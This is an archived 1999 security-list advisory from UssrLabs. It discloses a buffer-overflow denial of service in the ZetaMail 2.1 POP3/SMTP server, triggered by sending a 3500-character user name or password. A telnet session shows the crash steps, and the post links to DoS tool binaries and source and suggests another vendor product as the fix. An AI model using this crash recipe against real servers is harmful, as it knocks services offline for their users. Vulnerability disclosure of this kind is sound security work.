Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server

From: Ussr Labs (labsat_private)
Date: Fri Nov 19 1999 - 00:33:49 PST

Next message: Nick Craig-Wood: "Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7)"

Previous message: elfchiefat_private: "Re: Tektronix PhaserLink Webserver Reveals Admin Password"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability

PROBLEM

UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail POP3/SMTP
Server,
the buffer overflow is caused by a long user name/password, 3500 characters.

There is not much to expand on.... just a simple hole

Example:
[gimmemore@itsme]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK ZetaMail for 95 BD0211 <4294764405.063903189415041@itsme>
USER {buffer)
+OK Send password
PASS  {buffer)

Overflow Crashh.

Where (buffer) is 3500 characters.

Binary / Source for the D.o.s for Windows / Linux:

http://www.ussrback.com/zmail/

Vendor Status:
 Contacted.

Credit: USSRLABS

SOLUTION
 install another program from the same vendor,
 MsgCore/95 2.11,MsgCore/NT 2.10

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com

Next message: Nick Craig-Wood: "Re: ssh-1.2.27 remote buffer overflow - exploitable (VD#7)"
Previous message: elfchiefat_private: "Re: Tektronix PhaserLink Webserver Reveals Admin Password"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:13:22 PDT